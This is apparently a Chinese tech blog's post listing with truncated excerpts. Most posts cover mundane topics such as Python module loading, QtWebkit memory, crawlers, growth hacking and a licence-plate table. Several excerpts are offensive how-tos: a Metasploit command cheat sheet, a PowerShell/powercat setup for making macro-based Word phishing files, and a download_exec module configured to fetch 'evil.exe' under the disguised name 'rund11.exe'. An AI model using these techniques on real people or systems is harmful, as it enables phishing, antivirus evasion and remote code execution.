2016-04-28 16:51:07

metasploit 常用命令

show exploits 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击载荷。 search name 查找metasploit框架中所有的渗透攻击和其他模块。 info 展示出指定渗透攻击或模块的相关信息。 use name 装载一个渗透攻击或模块。 LHOST 你本地可以让目标主机连接的IP地址,通常当目标主机不在同一个局域网内时,就需要是一个公共IP地址,特别为反弹式shell使用。 RHOST 远程主机或是目标主机。 set function 设置特定的配置参数(EG:设置本地或远程主机参数)。 setg function 以全局方式设置特定的配置参数(EG:设置本地或远程主机参数)。 show options 列出某个渗透攻击或模块中所有的配置参数。 show targets 列出渗透攻击所有支持的目标平台。 set target num 指定你所知道的目标的操作系统以及补丁版本类型。 set payload name 指定想要使用的攻击载荷。 show advanced 列出所有高级配置选项。 set autorunscript migrat

2016-04-28 04:34:55

使用powershell Client进行有效钓鱼

Powershell是 windows下面非常强大的命令行工具,并且在 windows中 Powershell可以利用 .NET Framework的强大功能,也可以调用 windows API,在 win7/server 2008以后, powershell已被集成在系统当中。 除此之外,使用powershell能很好的bypass各种AV,在渗透测试中可谓是一个神器。此次使用的是开源的 powershell脚本集 nishang中的 client来制作钓鱼文件。其中 office类型文件可以达到钓鱼目的的前提是 office已经启用宏。 0x01制作 word钓鱼文件 下载powercat (powershell的nc) 加载powercat : PS G:\github\Pentest\powershell\powercat-master> . .\powercat.ps1 PS G:\github\Pentest\powershell\powercat-master> powercat You must select either client mode (-c) or listen mode (-l). 加载以后使用powercat开启监听: PS G:\github\Pentest\powershell\powercat-master> powe

2016-04-24 17:34:13

使用imp加载python模块

import imp import sys fn_, path, desc = imp.find_module('mymodule', ['/data/module/']) print fn_,path,desc mod = imp.load_module(''mymodule'', fn_, path, desc) print dir(mod) #这样就会把 /data/module/mymodule.py模块导入进来, load_modul方法的第一个参数可以任意写,例如mym, #作用相当于 import mymodule as mym

2016-04-09 04:19:36

降低QtWebkit内存使用量

在QtWebkit的QWebView加载网页的时候,会随着每加载一次网页内存就会增加。为解决这个问题可以通过以下代码解决。 QWebSettings::globalSettings()->setAttribute(QWebSettings::AutoLoadImages, false); QWebSettings::globalSettings()->setMaximumPagesInCache(0); QWebSettings::globalSettings()->setObjectCacheCapacities(0, 0, 0); QWebSettings::globalSettings()->setOfflineStorageDefaultQuota(0); QWebSettings::globalSettings()->setOfflineWebApplicationCacheQuota(0); QWebSettings::globalSettings()->clearIconDatabase(); QWebSettings::globalSettings()->clearMemoryCaches(); 其中QWebSettings::globalSettings()->clearIconDatabase(); QWebSet

2016-04-03 19:35:58

网络爬虫

网络爬虫(Web crawler),是一种“自动化浏览网络”的程序,或者说是一种网络机器人。它们被广泛用于互联网搜索引擎或其他类似网站,以获取或更新这些网站的内容和检索方式。它们可以自动采集所有其能够访问到的页面内容,以便程序做下一步的处理。 在WEB2.0时代,动态网页盛行起来。那么爬虫就应该能在页面内爬到这些有javascript生成的链接。当然动态解析页面只是爬虫的一个技术点。下面,我将按照如下顺序分享下面的这些内容的一些个人经验(编程语言为Python)。 1,爬虫架构。 2,页面下载与解析。 3,URL去重方法。 4,URL相似性算法。 5,并发操作。 6,数据存储 7,动态爬虫源码分享。 8,参考文章 0x01 爬虫架构 谈到爬虫架构,不得不提的是Scrapy的爬虫架构。Scrapy,是Python开发的一个快速,高层次的爬虫框架,用于抓取web站点并从页面 中提取结构化的数据。Scrapy用途广泛,可以用于数据挖掘、监测和自动化测试。Scrapy吸引人的地方在于它是一个框架,任何人都可以根据需求方便 的修改。它也提供了多种类型爬虫的基类,如BaseSpider、sitemap爬虫等。 上图是Scrapy的架构图,绿线是数据流向,首先从初始URL 开始,Scheduler 会将其交给 Downloader 进行下载,下载之后会交给 Spider 进行分析,需要保存的数据

2016-03-12 12:11:38

Metasploit运行自定义后渗透模块

在某些溢出成功后,我们需要运行自己的模块,如远控、扫描器等,可以使用下面的一些方法: 0x01.利用其他后渗透模块驱动执行,如使用meterpreter脚本,获得sessions后使用meterpreter来进行上传和执行 0x02.利用windows/download_exec模块,下载执行: 模块信息: Name Current Setting Required Description ---- --------------- -------- ----------- EXE rund11.exe yes Filename to save & run executable on target system EXITFUNC process yes Exit technique: seh, thread, process, none URL https://localhost:443/evil.exe yes The pre-encoded URL to the executable 这个模块的脚本

2015-08-27 14:07:54

Growth Hacker

作为一个经常拿growth hacking当特殊技能点的人发一下言。 首先,假设诸君和我一样我不想看拗口的概念词汇,那growth hacker在我理解里就是:产品初期通过用户行为快速定位,后期实现小投入大量增长的人。 -- 国外诸君在此议题上已经有过激烈讨论(见Quora) slideshare 上也有业界分享,推荐两个: http://www.slideshare.net/mattangriffel/growth-hacking 非常实惠划算的123页,但是放心,除了记几张流量图以外都是典型ppt图,直接快速按右键 http://www.slideshare.net/dmc500hats/startup-metrics-ignite-velocity 长得很干货其实除了看起来视觉疲劳以外真的很干货的东西。 -- 小生我在当年年少轻狂的时候也写过一篇The Cheesecake Test (是的,抱歉了各位也是英文的),简单说,就是对一个虚拟的芝士蛋糕公司做了虚拟的A/B(准确说,还有C/D) Test... --- 实在不喜欢英文的或者想要看到具体要求的各位,请参考钛点的某篇: 牛x公司如37Signals怎么招Growth Hacker ---- 很好,列完了参考直接讲点通俗易于理解的好了,到底可以做到什么。(警告:以下太通俗,代码人请忍住。。) 第二个链接的dave在里面提

2015-08-02 14:53:08

全国车牌号查归属询表

北省(冀) 河南省(豫) 云南省(云) 牌号 地区 牌号 地区 牌号 地区 冀A 石家庄市 豫A 郑州市 云A 昆明市 冀B 唐山市 豫B 开封市 云B 东川市 冀C 秦皇岛市 豫C 洛阳市 云C 昭通行署 冀D 邯郸市 豫D 平顶山市 云D 曲靖行署 冀E 刑台市 豫E 安阳市 云E 楚雄彝族 冀F 保定市 豫F 鹤壁市 云F 玉溪行署 冀G 张家口市 豫G 新乡市 云G 红河哈尼族 冀H 承德市 豫H 焦作市 云H 文山壮族苗 冀J 沧州市 豫J 濮阳市 云J 思茅行署 冀K 邯郸行署 豫K 许昌市 云K 西双版纳 冀L 刑台行署 豫L 漯河市 云L 大理白族 冀N 保定行署 豫M 三门峡市 云M 保山行署 冀P 张家口行署 豫N 商丘行署 云N 德宏傣族 冀Q 承德行署 豫P 周口行署 云P 丽江行署 冀R 廊坊市 豫Q 驻马店行署 云Q 怒江傈族 冀S 沧州行署 豫R 南阳行署 云R 迪庆藏族 冀T 衡水行署 豫S 信阳行署 云S 临沧行署 辽宁省(辽) 黑龙江省(黑) 湖南省(湘) 辽A 沈阳市 黑A 哈尔滨市 湘A 长沙市 辽B 大连市 黑B 齐齐哈尔市 湘B 株州市 辽C 鞍山市 黑C 牡丹江市 湘C 湘潭市 辽D 抚顺市 黑D 佳木斯市 湘D 衡阳市 辽E 本溪市 黑E 大庆市 湘E 邵阳市 辽F 丹东市 黑F 伊春市 湘F 岳阳市 辽G 锦州市 黑G 鸡西市 湘G